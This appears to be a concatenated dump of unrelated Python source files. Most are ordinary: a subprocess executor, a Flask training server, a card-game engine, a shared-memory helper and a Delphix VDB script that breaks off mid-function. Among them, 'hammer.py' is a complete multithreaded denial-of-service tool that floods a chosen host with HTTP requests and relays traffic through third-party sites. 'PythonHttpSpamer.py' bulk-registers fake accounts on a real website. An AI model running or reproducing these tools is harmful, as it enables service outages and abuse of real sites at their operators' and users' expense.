utils.get_logger().info("pip show command is %s",command)
output = utils.GetCommandOutput(command)
if output.strip() == "":
return None
name = package_name
version = 'Unknown'
name_flag = 'Name:'
ver_flag = 'Version:'
location = None
for line in output.splitlines():
if line.find(name_flag) != -1:
name = line.replace(name_flag,"").strip()
elif line.find(ver_flag) != -1:
version = line.replace(ver_flag,"").strip()
#获取包安装路径,在linux用来判断卸载包时是否需要root权限
elif line.find('Location:') != -1:
location = line.replace('Location:',"").strip()
python_package = PythonPackage(**{'Name':name,'Version':version,'Location':location})
return python_package
def DumpPackages(self):
packages = {}
for name in self._packages:
package = self._packages[name]
dct = {
'Name':package.Name,
'Version':package.Version
}
packages[name] = dct
return packages
def GetExedirs(self):
result = []
main_scripts = os.path.join(self.InstallPath, "Scripts")
if os.path.isdir(main_scripts) and main_scripts not in result:
result.append(main_scripts)
if os.path.dirname(self.Path) not in result:
result.append(os.path.dirname(self.Path))
return result
def SetInterpreter(self,**kwargs):
BuiltinPythonInterpreter.SetInterpreter(self,**kwargs)
self.SetBuiltinName()
def SetBuiltinName(self):
#builtin module name which python2 is __builtin__ and python3 is builtins
if self.IsV3():
self._builtin_module_name = "builtins"
elif self.IsV2():
self._builtin_module_name = "__builtin__" |
PythonHttpSpamer.py | import sys
import argparse
import requests
from bs4 import BeautifulSoup
from queue import Queue
from threading import Thread
# set up some global variables
newAccountNameTemplate = "tester-"
num_threads = 4
jobsQueue = Queue()
resultQueue = Queue()
startIndex = 1
stopIndex = 10
def parseArgs(argv):
# WIP
parser = argparse.ArgumentParser()
parser.add_argument("--start", type=int)
parser.add_argument("--stop", type=int)
args = parser.parse_args()
def post_request(username):
payload = {
"allcountries": "0",
"username": username,
"email": "xoxo+"+username+"@gmail.com",
"password1": "1234",
"password2": "1234",
"TOS": "ON",
"submit": "Zarejestruj się"
}
r = requests.post("http://opencaching.pl/register.php", data=payload)
soup = BeautifulSoup(r.text, "html.parser")
wynik = soup.select(".content2-pagetitle")[0].text
return wynik
def createAccount(i, q, r):
while True:
username = q.get()
print("[%s]" % (i+1))
wynik = post_request(username)
if "Nowy użytkownik" in wynik:
r.put(username)
q.task_done()
def main(argv):
#parseArgs(argv)
#input("Press RETURN to continue...")
print("*** Launching workers")
for i in range(num_threads):
worker = Thread(target=createAccount, args=(i, jobsQueue, resultQueue,))
worker.setDaemon(True)
worker.start()
print("*** Feeding queue with usernames")
for i in range(startIndex, stopIndex):
val = newAccountNameTemplate + str(i)
jobsQueue.put(val)
print("*** Working...\n")
jobsQueue.join()
if resultQueue.empty():
print("No new users :(")
else:
print("*** List of created users")
while not resultQueue.empty():
print(resultQueue.get())
print("*** Done")
input()
if __name__ == "__main__":
sys.exit(int(main(sys.argv[1:]) or 0))
|
PythonExecutor.py | #!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import ambari_simplejson as json
import logging
import os
import subprocess
import pprint
import threading
import platform
from threading import Thread
import time
from BackgroundCommandExecutionHandle import BackgroundCommandExecutionHandle
from ambari_commons.os_check import OSConst, OSCheck
from Grep import Grep
import sys
from ambari_commons import shell
from ambari_commons.shell import shellRunner
logger = logging.getLogger()
class PythonExecutor(object):
"""
Performs functionality for executing python scripts.
Warning: class maintains internal state. As a result, instances should not be
used as a singleton for a concurrent execution of python scripts
"""
NO_ERROR = "none"
def __init__(self, tmpDir, config):
self.grep = Grep()
self.event = threading.Event()
self.python_process_has_been_killed = False
self.tmpDir = tmpDir
self.config = config
pass
def open_subprocess_files(self, tmpoutfile, tmperrfile, override_output_files):
if override_output_files: # Recreate files
tmpout = open(tmpoutfile, 'w')
tmperr = open(tmperrfile, 'w')
else: # Append to files
tmpout = open(tmpoutfile, 'a')
tmperr = open(tmperrfile, 'a')
return tmpout, tmperr
def run_file(self, script, script_params, tmpoutfile, tmperrfile,
timeout, tmpstructedoutfile, callback, task_id,
override_output_files = True, handle = None, log_info_on_failure=True):
"""
Executes the specified python file in a separate subprocess.
Method returns only when the subprocess is finished.
Params arg is a list of script parameters
Timeout meaning: how many seconds should pass before script execution
is forcibly terminated
override_output_files option defines whether stdout/stderr files will be
recreated or appended.
The structured out file, however, is preserved during multiple invocations that use the same file.
"""
pythonCommand = self.python_command(script, script_params)
logger.debug("Running command " + pprint.pformat(pythonCommand))
if handle is None:
tmpout, tmperr = self.open_subprocess_files(tmpoutfile, tmperrfile, override_output_files)
process = self.launch_python_subprocess(pythonCommand, tmpout, tmperr)
# map task_id to pid
callback(task_id, process.pid)
logger.debug("Launching watchdog thread")
self.event.clear()
self.python_process_has_been_killed = False
thread = Thread(target = self.python_watchdog_func, args = (process, timeout))
thread.start()
# Waiting for the process to be either finished or killed
process.communicate()
self.event.set()
thread.join()
result = self.prepare_process_result(process.returncode, tmpoutfile, tmperrfile, tmpstructedoutfile, timeout=timeout)
if log_info_on_failure and result['exitcode']:
self.on_failure(pythonCommand, result)
return result
else:
holder = Holder(pythonCommand, tmpoutfile, tmperrfile, tmpstructedoutfile, handle)
background = BackgroundThread(holder, self)
background.start()
return {"exitcode": 777}
def on_failure(self, pythonCommand, result):
"""
Log some useful information after task failure.
"""
logger.info("Command " + pprint.pformat(pythonCommand) + " failed with exitcode=" + str(result['exitcode']))
if OSCheck.is_windows_family():
cmd_list = ["WMIC path win32_process get Caption,Processid,Commandline", "netstat -an"]
else:
cmd_list = ["ps faux", "netstat -tulpn"]
shell_runner = shellRunner()
for cmd in cmd_list:
ret = shell_runner.run(cmd)
logger.info("Command '{0}' returned {1}. {2}{3}".format(cmd, ret["exitCode"], ret["error"], ret["output"]))
def prepare_process_result(self, returncode, tmpoutfile, tmperrfile, tmpstructedoutfile, timeout=None):
out, error, structured_out = self.read_result_from_files(tmpoutfile, tmperrfile, tmpstructedoutfile)
if self.python_process_has_been_killed:
error = str(error) + "\n Python script has been killed due to timeout" + \
(" after waiting %s secs" % str(timeout) if timeout else "")
returncode = 999
result = self.condenseOutput(out, error, returncode, structured_out)
logger.debug("Result: %s" % result)
return result
def read_result_from_files(self, out_path, err_path, structured_out_path):
out = open(out_path, 'r').read()
error = open(err_path, 'r').read()
try:
with open(structured_out_path, 'r') as fp:
structured_out = json.load(fp)
except Exception:
if os.path.exists(structured_out_path):
errMsg = 'Unable to read structured output from ' + structured_out_path
structured_out = {
'msg' : errMsg
}
logger.warn(structured_out)
else:
structured_out = {}
return out, error, structured_out
def launch_python_subprocess(self, command, tmpout, tmperr):
"""
Creates subprocess with given parameters. This functionality was moved to separate method
to make possible unit testing
"""
close_fds = None if OSCheck.get_os_family() == OSConst.WINSRV_FAMILY else True
command_env = dict(os.environ)
if OSCheck.get_os_family() == OSConst.WINSRV_FAMILY:
command_env["PYTHONPATH"] = os.pathsep.join(sys.path)
for k, v in command_env.iteritems():
command_env[k] = str(v)
return subprocess.Popen(command,
stdout=tmpout,
stderr=tmperr, close_fds=close_fds, env=command_env)
def isSuccessfull(self, returncode):
return not self.python_process_has_been_killed and returncode == 0
def python_command(self, script, script_params):
#we need manually pass python executable on windows because sys.executable will return service wrapper
python_binary = os.environ['PYTHON_EXE'] if 'PYTHON_EXE' in os.environ else sys.executable
python_command = [python_binary, script] + script_params
return python_command
def condenseOutput(self, stdout, stderr, retcode, structured_out):
log_lines_count = self.config.get('heartbeat', 'log_lines_count')
result = {
"exitcode": retcode,
"stdout": self.grep.tail(stdout, log_lines_count) if log_lines_count else stdout,
"stderr": self.grep.tail(stderr, log_lines_count) if log_lines_count else stderr,
"structuredOut" : structured_out
}
return result
def python_watchdog_func(self, python, timeout):
self.event.wait(timeout)
if python.returncode is None:
logger.error("Subprocess timed out and will be killed")
shell.kill_process_with_children(python.pid)
self.python_process_has_been_killed = True
pass
class Holder:
def __init__(self, command, out_file, err_file, structured_out_file, handle):
self.command = command
self.out_file = out_file
self.err_file = err_file
self.structured_out_file = structured_out_file
self.handle = handle
class BackgroundThread(threading.Thread):
def __init__(self, holder, pythonExecutor):
threading.Thread.__init__(self)
self.holder = holder
self.pythonExecutor = pythonExecutor
def run(self):
process_out, process_err = self.pythonExecutor.open_subprocess_files(self.holder.out_file, self.holder.err_file, True)
logger.debug("Starting process command %s" % self.holder.command)
process = self.pythonExecutor.launch_python_subprocess(self.holder.command, process_out, process_err)
logger.debug("Process has been started. Pid = %s" % process.pid)
self.holder.handle.pid = process.pid
self.holder.handle.status = BackgroundCommandExecutionHandle.RUNNING_STATUS
self.holder.handle.on_background_command_started(self.holder.handle.command['taskId'], process.pid)
process.communicate()
self.holder.handle.exitCode = process.returncode
process_condensed_result = self.pythonExecutor.prepare_process_result(process.returncode, self.holder.out_file, self.holder.err_file, self.holder.structured_out_file)
logger.debug("Calling callback with args %s" % process_condensed_result)
self.holder.handle.on_background_command_complete_callback(process_condensed_result, self.holder.handle)
logger.debug("Exiting from thread for holder pid %s" % self.holder.handle.pid)
|
light_server.py | '''
pip install flask gevent requests pillow
https://github.com/jrosebr1/simple-keras-rest-api
https://gist.github.com/kylehounslow/767fb72fde2ebdd010a0bf4242371594
'''
''' Usage
python ..\scripts\classifier.py --socket=5000 --weights=weights\obj_last.weights
curl -X POST -F image=@dog.png http://localhost:5000/training/begin?plan=testplan
'''
import threading
import time
import csv
import datetime
import flask
import traceback
import sys
import os
import cv2 as cv
import argparse
import lightnet
import darknet
import socket
import requests
import get_ar_plan
import logging
logger = logging.getLogger(__name__)
app = flask.Flask(__name__)
from os.path import join
args = None
nets = []
metas = []
args_groups = []
csv_file = None
csv_writer = None
cap = None
gpu_lock = threading.Lock()
host_ip = 'localhost'
#
server_state_idle = 0
server_state_training = 1
server_state = None
server_training_status = {
'plan_name': '',
'percentage': 0,
}
server_training_status_internal = {
'folders': [],
}
def get_Host_name_IP():
try:
global host_ip
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("baidu.com", 80))
host_ip, _ = s.getsockname()
print("http://%s:5000" % host_ip)
except:
print("Unable to get Hostname and IP")
@app.route("/", methods=["GET"])
def index_get():
data = vars(args)
data['usage'] = "curl -X POST -F image=@dog.png http://%s:5000/predict" % (
host_ip)
return flask.jsonify(data)
def go_idle():
global server_state, server_training_status, server_training_status_internal
server_state = server_state_idle
server_training_status['plan_name'] = ''
server_training_status['percentage'] = 0
server_training_status_internal['folders'] = []
@app.route("/training/status", methods=["GET"])
def training_status():
return flask.jsonify(server_training_status)
def training_thread_function(training_folders):
global server_state, server_training_status, server_training_status_internal
server_training_status_internal['folders'] = training_folders
import subprocess
idx = 1 # start from 1
for folder in training_folders:
bat_file = join(folder, 'train.bat')
logging.info("%s: starting", bat_file)
p = subprocess.Popen(bat_file, shell=True, stdout = subprocess.PIPE)
stdout, stderr = p.communicate()
print(p.returncode) # is 0 if success
logging.info("%s: finishing", bat_file)
server_training_status['percentage'] = idx * 100 / len(training_folders)
idx += 1
go_idle()
@app.route("/training/begin", methods=["GET"])
def training_begin():
global server_state, server_training_status
if server_state != server_state_idle:
result = {
'errCode': 'Busy', # 'OK/Busy/Error'
'errMsg': 'Server is busy training %s' % server_training_status['plan_name']
}
return flask.jsonify(result)
try:
server_state = server_state_training
plan = flask.request.args.get("plan")
print(plan)
server_training_status['plan_name'] = plan
server_training_status['percentage'] = 0
url = 'http://localhost:8800/api/Training/plan?plan=%s' % plan
response = requests.get(url)
plan_json = response.json()
# return flask.jsonify(result)
training_folders = get_ar_plan.prepare_training_folders(plan_json)
x = threading.Thread(target=training_thread_function, args=(training_folders,))
x.start()
result = {
'errCode': 'OK', # 'OK/Busy/Error'
'errMsg': ''
}
except:
error_callstack = traceback.format_exc()
print(error_callstack)
result = {
'errCode': 'Error', # or 'Error'
'errMsg': error_callstack
}
go_idle()
return flask.jsonify(result)
def main():
# lightnet.set_cwd(dir)
global nets, metas, args, cap, args_groups
global server_state
server_state = server_state_idle
def add_bool_arg(parser, name, default=False):
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument('--' + name, dest=name, action='store_true')
group.add_argument('--no-' + name, dest=name, action='store_false')
parser.set_defaults(**{name: default})
parser = argparse.ArgumentParser()
parser.add_argument('--group', default='default')
parser.add_argument('--cfg', default='obj.cfg')
parser.add_argument('--weights', default='weights/obj_last.weights')
parser.add_argument('--names', default='obj.names')
parser.add_argument('--socket', type=int, default=5000)
parser.add_argument('--top_k', type=int, default=5)
parser.add_argument('--gold_confidence', type=float, default=0.95)
parser.add_argument('--threshold', type=float, default=0.5)
add_bool_arg(parser, 'debug')
args = parser.parse_args()
logging.basicConfig(level=logging.INFO)
# flask routine
print('=========================================')
get_Host_name_IP()
print('=========================================')
app.run(host='0.0.0.0', port=args.socket, threaded=True)
if __name__ == "__main__":
main()
|
engine.py | """
This file contains functions to regulate game play.
"""
from api import State, Deck, util
from multiprocessing import Process, Manager
def play(
player1, # type: Bot
player2, # type: Bot
state, # type: State
max_time=5000, # type: int
verbose=True, # type: bool
fast=False # type: bool
):
"""
Play a game between two given players, from the given starting state.
"""
pr('player1: {}'.format(player1), verbose)
pr('player2: {}'.format(player2), verbose)
# The game loop
while not state.finished():
player = player1 if state.whose_turn() == 1 else player2
# We introduce a state signature which essentially obscures the deck's perfect knowledge from the player
given_state = state.clone(signature=state.whose_turn()) if state.get_phase() == 1 else state.clone()
move = player.get_move(given_state) if fast else get_move(given_state, player, max_time, verbose)
if is_valid(move, player): # check for common mistakes
if move[0] is None:
pr('* Player {} performs a trump jack exchange'.format(state.whose_turn()), verbose)
else:
pr('* Player {} plays: {}{}'.format(state.whose_turn(), util.get_rank(move[0]), util.get_suit(move[0])), verbose)
if move[1] is not None:
pr('* Player {} melds a marriage between {}{} and {}{}'.format(state.whose_turn(), util.get_rank(move[0]), util.get_suit(move[0]), util.get_rank(move[1]), util.get_suit(move[1])), verbose)
state = state.next(move)
pr(state, verbose)
if not state.revoked() is None:
pr('! Player {} revoked (made illegal move), game finished.'.format(state.revoked()), verbose)
else:
state.set_to_revoked()
pr('Game finished. Player {} has won, receiving {} points.'.format(state.winner()[0], state.winner()[1]), verbose)
return state.winner()
def get_move(state, player, max_time, verbose):
"""
Asks a player bot for a move. Creates a separate process, so we can kill
computation if ti exceeds a maximum time.
:param state:
:param player:
:return:
"""
# We call the player bot in a separate process.This allows us to terminate
# if the player takes too long.
manager = Manager()
result = manager.dict() # result is a variable shared between our process and
# the player's. This allows it to pass the move to us
# Start a process with the function 'call_player' and the given arguments
process = Process(target=call_player, args=(player, state, result))
# Start the process
process.start()
# Rejoin at most max_time miliseconds later
process.join(max_time / 1000)
# Check if the process terminated in time
move = None
if process.is_alive():
pr('! Player {} took too long, game revoked.'.format(state.whose_turn()), verbose)
process.terminate()
process.join()
move = "Late"
else:
# extract the move
if 'move' in result:
move = result['move']
return move
def call_player(player, state, result):
# Call the player to make the move
move = player.get_move(state)
# Put the move in the shared variable, so it can be read by the
# engine process
result['move'] = move
def pr(string, verbose):
"""
Print the given message if verbose is true, otherwise ignore.
:param string: Message to print
:param verbose: Whether to print the message
"""
if(verbose):
print(string)
#Syntax checking the move
def is_valid(
move, # type: tuple[int, int]
player):
"""
Check a move for common mistakes, and throw a (hopefully) helpful error message if incorrect.
:param move:
:param player:
"""
if move == "Late":
return False
if not type(move) is tuple:
print('Bot {} returned a move {} that was not a pair (i.e. (2,3))'.format(player, move))
return False
if len(move) != 2:
print('Bot {} returned a move {} that was not of length 2.'.format(player, move))
return False
if ((type(move[0]) is not int) and (move[0] is not None)) or ((type(move[1]) is not int) and (move[1] is not None)):
print('Bot {} returned a move {} that was not a tuple for which each element is either an int or None'.format(player, move))
return False
if move[0] is None and move[1] is None:
print('Bot {} returned (None, None). At least one of the elements needs to be an integer.'.format(player))
return False
return True
|
hammer.py | #!/Library/Frameworks/Python.framework/Versions/3.4/bin/python3
# -*- coding: utf-8 -*-
# python 3.3.2+ Hammer Dos Script v.1
# by Can Yalçın
# only for legal purpose
from queue import Queue
from optparse import OptionParser
import time,sys,socket,threading,logging,urllib.request,random
def user_agent():
global uagent
uagent=[]
uagent.append("uagent Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("uagent=[]Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
return(uagent)
def my_bots():
global bots
bots=[]
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
return(bots)
def bot_hammering(url):
try:
while True:
req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)}))
print("\033[94mbot is hammering...\033[0m")
time.sleep(.1)
except:
time.sleep(.1)
def down_it(item):
try:
while True:
packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
if s.sendto( packet, (host, int(port)) ):
s.shutdown(1)
print ("\033[92m",time.ctime(time.time()),"\033[0m \033[94m <--packet sent! hammering--> \033[0m")
else:
s.shutdown(1)
print("\033[91mshut<->down\033[0m")
time.sleep(.1)
except socket.error as e:
print("\033[91mno connection! server maybe down\033[0m")
#print("\033[91m",e,"\033[0m")
time.sleep(.1)
def dos():
while True:
item = q.get()
down_it(item)
q.task_done()
def dos2():
while True:
item=w.get()
bot_hammering(random.choice(bots)+"http://"+host)
w.task_done()
def usage():
print (''' \033[92m Hammer Dos Script v.1 http://www.canyalcin.com/
It is the end user's responsibility to obey all applicable laws.
It is just for server testing script. Your ip is visible. \n
usage : python3 hammer.py [-s] [-p] [-t]
-h : help
-s : server ip
-p : port default 80
-t : turbo default 135 \033[0m''')
sys.exit()
def get_parameters():
global host
global port
global thr
global item
optp = OptionParser(add_help_option=False,epilog="Hammers")
optp.add_option("-q","--quiet", help="set logging to ERROR",action="store_const", dest="loglevel",const=logging.ERROR, default=logging.INFO)
optp.add_option("-s","--server", dest="host",help="attack to server ip -s ip")
optp.add_option("-p","--port",type="int",dest="port",help="-p 80 default 80")
optp.add_option("-t","--turbo",type="int",dest="turbo",help="default 135 -t 135")
optp.add_option("-h","--help",dest="help",action='store_true',help="help you")
opts, args = optp.parse_args()
logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')
if opts.help:
usage()
if opts.host is not None:
host = opts.host
else:
usage()
if opts.port is None:
port = 80
else:
port = opts.port
if opts.turbo is None:
thr = 135
else:
thr = opts.turbo
# reading headers
global data
headers = open("headers.txt", "r")
data = headers.read()
headers.close()
#task queue are q,w
q = Queue()
w = Queue()
if __name__ == '__main__':
if len(sys.argv) < 2:
usage()
get_parameters()
print("\033[92m",host," port: ",str(port)," turbo: ",str(thr),"\033[0m")
print("\033[94mPlease wait...\033[0m")
user_agent()
my_bots()
time.sleep(5)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
s.settimeout(1)
except socket.error as e:
print("\033[91mcheck server ip and port\033[0m")
usage()
while True:
for i in range(int(thr)):
t = threading.Thread(target=dos)
t.daemon = True # if thread is exist, it dies
try:
t.start()
except RuntimeError:
print("Hammer Failed")
t2 = threading.Thread(target=dos2)
t2.daemon = True # if thread is exist, it dies
try:
t2.start()
except RuntimeError:
print("Hammer Failed")
start = time.time()
#tasking
item = 0
while True:
if (item>1800): # for no memory crash
item=0
time.sleep(.1)
item = item + 1
q.put(item)
w.put(item)
q.join()
w.join()
|
easyshare.py | import ctypes
import hashlib
import multiprocessing
from multiprocessing.sharedctypes import RawValue
import threading
import json
import cPickle
class Share( property ):
__ver__ = 2
def __init__( self, _v=None, maxsize=10240, serializing=json, szarg=None ):
class ShareStructure ( ctypes.Structure ):
_fields_ = [("len", ctypes.c_long ),
("md5", ctypes.c_char* 32),
("data", ctypes.c_char* maxsize)]
if serializing == 'json' :
serializing = json
if szarg == None :
szarg = ( {'encoding':'utf-8'}, {'encoding':'utf-8'} )
elif serializing == 'pickle' :
serializing = cPickle
if szarg == None :
szarg = ({},{})
self.maxsize = maxsize
self.szarg = szarg
self.sz = serializing
self.sharestruct = ShareStructure
s = ShareStructure( 0, '', '' )
self.sharespace = RawValue( ShareStructure, 1 )
self.lock = threading.Lock()
self.value = _v
property.__init__( self, self.value_getter , self.value_setter )
def on_sharereload( self, newvalue ):
return newvalue
def value_getter( self, host ):
if self.md5 != self.sharespace.md5 :
self.lock.acquire()
try :
l = self.sharespace.len
m = self.sharespace.md5
j = self.sharespace.data
if len(j) == l and hashlib.md5(j).hexdigest() == m :
self._value = self.on_sharereload(
self.sz.loads( j, **self.szarg[1] ) )
self.md5 = m
finally :
self.lock.release()
return self._value
def value_setter( self, host, value ):
self.lock.acquire()
try :
j = self.sz.dumps( value, **self.szarg[0])
m = hashlib.md5(j).hexdigest()
l = len(j)
if l > self.maxsize :
raise Exception, 'data too large.'
self.sharespace.len = l
self.sharespace.md5 = m
self.sharespace.data = j
self.md5 = hashlib.md5(j).hexdigest()
self._value = self.on_sharereload( value )
finally :
self.lock.release()
#self.md5 = hashlib.md5(j).hexdigest()
#self._value = self.on_sharereload( value )
return
def _value_getter( self ):
return self.value_getter( self )
def _value_setter( self, value ):
return self.value_setter( self, value )
value = property( _value_getter, _value_setter )
if __name__ == '__main__' :
import time
def foo(sharevalue):
for x in xrange(4):
time.sleep(0.5)
sharevalue.value = x
s = Share()
p = multiprocessing.Process( target=foo, args=(s,) )
p.start()
for x in xrange(5):
time.sleep(0.4)
print s.value
p.join()
# as the last of value's time interval same ( 0.4*5 = 0.5*4 )
# the result maybe : None, 0, 1, 2, 3
# also maybe : None, 0, 1, 2, 2 |
dx_operations_vdb.py | #!/usr/bin/env python
# Corey Brune - Oct 2016
#This script starts or stops a VDB
#requirements
#pip install docopt delphixpy
#The below doc follows the POSIX compliant standards and allows us to use
#this doc to also define our arguments for the script.
"""List all VDBs or Start, stop, enable, disable a VDB
Usage:
dx_operations_vdb.py (--vdb <name [--stop | --start | --enable | --disable] | --list)
[-d <identifier> | --engine <identifier> | --all]
[--debug] [--parallel <n>] [--poll <n>]
[--config <path_to_file>] [--logdir <path_to_file>]
dx_operations_vdb.py -h | --help | -v | --version
List all VDBs, start, stop, enable, disable a VDB
Examples:
dx_operations_vdb.py -d landsharkengine --vdb testvdb --stop
dx_operations_vdb.py --vdb --start
Options:
--vdb <name> Name of the VDB to stop or start
--start Stop the VDB
--stop Stop the VDB
--list List all databases from an engine
--enable Enable the VDB
--disable Disable the VDB
-d <identifier> Identifier of Delphix engine in dxtools.conf.
--engine <type> Alt Identifier of Delphix engine in dxtools.conf.
--all Run against all engines.
--debug Enable debug logging
--parallel <n> Limit number of jobs to maxjob
--poll <n> The number of seconds to wait between job polls
[default: 10]
--config <path_to_file> The path to the dxtools.conf file
[default: ./dxtools.conf]
--logdir <path_to_file> The path to the logfile you want to use.
[default: ./dx_operations_vdb.log]
-h --help Show this screen.
-v --version Show version.
"""
VERSION="v.0.0.002"
from docopt import docopt
import logging
from os.path import basename
import signal
import sys
import time
import traceback
import json
from multiprocessing import Process
from time import sleep, time
from delphixpy.v1_7_0.delphix_engine import DelphixEngine
from delphixpy.v1_7_0.exceptions import HttpError, JobError
from delphixpy.v1_7_0 import job_context
from delphixpy.v1_7_0.web import database, host, job, source
from delphixpy.v1_7_0.exceptions import RequestError, JobError, HttpError
class dlpxException(Exception):
def __init__(self, message):
self.message = message
def vdb_operation(engine, server, jobs, vdb_name, operation):
"""
Function to start, stop, enable or disable a VDB
"""
print_debug(engine['hostname'] + ': Searching for ' + vdb_name +
' reference.\n')
vdb_obj = find_obj_by_name(engine, server, source, vdb_name)
try:
if vdb_obj:
if operation == 'start':
source.start(server, vdb_obj.reference)
elif operation == 'stop':
source.stop(server, vdb_obj.reference)
elif operation == 'enable':
source.enable(server, vdb_obj.reference)
elif operation == 'disable':
source.disable(server, vdb_obj.reference)
jobs[engine['hostname']] = server.last_job
except (RequestError, HttpError, JobError, AttributeError), e:
raise dlpxException('An error occurred while performing ' +
operation + ' on ' + vdb_name + '.:%s\n' % (e))
def list_databases(engine, server, jobs):
"""
Function to list all databases for a given engine
"""
try:
databases = database.get_all(server)
for db in databases:
if db.provision_container == None:
db.provision_container = 'dSource'
print 'name = ', str(db.name), '\n', 'current timeflow = ', \
str(db.current_timeflow), '\n', 'provision container = ', \
str(db.provision_container), '\n', 'processor = ', \
str(db.processor), '\n'
except (RequestError, HttpError, JobError, AttributeError), e:
print 'An error occurred while listing databases on ' + \
engine['ip_address'] + '.:%s\n' % (e)
def find_obj_by_name(engine, server, f_class, obj_name):
"""
Function to find objects by name and object class, and return object's
reference as a string
You might use this function to find objects like groups.
"""
print_debug(engine["hostname"] + ": Searching objects in the " +
f_class.__name__ + " class\n for one named \"" +
obj_name + "\"")
obj_ref = ''
all_objs = f_class.get_all(server)
try:
for obj in all_objs:
if obj.name == obj_name:
print_debug(engine["hostname"] + ": Found a match " +
str(obj.reference))
return obj
#If the code reaches here, the object was not found.
raise dlpxException('Object %s not found in %s\n' % (obj_name,
engine['ip_address']))
except (RequestError, HttpError, JobError, AttributeError), e:
raise dlpxException('Object %s not found in %s' % (obj_name,
engine['ip_address']))
def get_config(config_file_path):
"""
This function reads in the dxtools.conf file
"""
#First test to see that the file is there and we can open it
try:
config_file = open(config_file_path).read()
except:
print_error("Was unable to open " + config_file_path +
". Please check the path and permissions, then try again.")
sys.exit(1)
#Now parse the file contents as json and turn them into a python
# dictionary, throw an error if it isn't proper json
try:
config = json.loads(config_file)
except:
print_error("Was unable to read " + config_file_path +
" as json. Please check file in a json formatter and " +
"try again.")
sys.exit(1)
#Create a dictionary of engines (removing the data node from the
# dxtools.json, for easier parsing)
delphix_engines = {}
for each in config['data']:
delphix_engines[each['hostname']] = each
print_debug(delphix_engines)
return delphix_engines
def logging_est(logfile_path):
"""
Establish Logging
"""
global debug
logging.basicConfig(filename=logfile_path,format='%(levelname)s:%(asctime)s:%(message)s', level=logging.INFO, datefmt='%Y-%m-%d %H:%M:%S')
print_info("Welcome to " + basename(__file__) + ", version " + VERSION)
global logger
debug = arguments['--debug']
logger = logging.getLogger()
if debug == True:
logger.setLevel(10)
print_info("Debug Logging is enabled.")
def job_mode(server):
"""
This function tells Delphix how to execute jobs, based on the
single_thread variable at the beginning of the file
"""
#Synchronously (one at a time)
if single_thread == True:
job_m = job_context.sync(server)
print_debug("These jobs will be executed synchronously")
#Or asynchronously
else:
job_m = job_context.async(server)
print_debug("These jobs will be executed asynchronously")
return job_m
def job_wait():
"""
This job stops all work in the thread/process until jobs are completed.
"""
#Grab all the jos on the server (the last 25, be default)
all_jobs = job.get_all(server)
#For each job in the list, check to see if it is running (not ended)
for jobobj in all_jobs:
if not (jobobj.job_state in ["CANCELED", "COMPLETED", "FAILED"]):
print_debug("Waiting for " + jobobj.reference + " (currently: " +
jobobj.job_state +
") to finish running against the container")
#If so, wait
job_context.wait(server,jobobj.reference)
def on_exit(sig, func=None):
"""
This function helps us end cleanly and with exit codes
"""
print_info("Shutdown Command Received")
print_info("Shutting down " + basename(__file__))
sys.exit(0)
def print_debug(print_obj):
"""
Call this function with a log message to prefix the message with DEBUG
"""
try:
if debug == True:
print "DEBUG: " + str(print_obj)
logging.debug(str(print_obj))
except:
pass
def print_error(print_obj):
"""
Call this function with a log message to prefix the message with ERROR
"""
print "ERROR: " + str(print_obj)
logging.error(str(print_obj))
def print_info(print_obj):
"""
Call this function with a log message to prefix the message with INFO
"""
print "INFO: " + str(print_obj)
logging.info(str(print_obj))
def print_warning(print_obj):
"""
Call this function with a log message to prefix the message with WARNING
"""
print "WARNING: " + str(print_obj)
logging.warning(str(print_obj))
def run_async(func):
"""
http://code.activestate.com/recipes/576684-simple-threading-decorator/
run_async(func)
function decorator, intended to make "func" run in a separate
thread (asynchronously).
Returns the created Thread object
E.g.:
@run_async
def task1():
do_something
@run_async
def task2():
do_something_too
t1 = task1()
t2 = task2()
...
t1.join()
t2.join()
"""
from threading import Thread
from functools import wraps
@wraps(func)
def async_func(*args, **kwargs):
func_hl = Thread(target = func, args = args, kwargs = kwargs)
func_hl.start()
return func_hl
return async_func
@run_async
def main_workflow(engine):
"""
This function actually runs the jobs.
Use the @run_async decorator to run this function asynchronously.
This allows us to run against multiple Delphix Engine simultaneously
"""
#Pull out the values from the dictionary for this engine
engine_address = engine["ip_address"]
engine_username = engine["username"]
engine_password = engine["password"]
#Establish these variables as empty for use later
jobs = {}
#Setup the connection to the Delphix Engine
server = serversess(engine_address, engine_username, engine_password)
try:
if arguments['--vdb']:
#Get the database reference we are copying from the database name
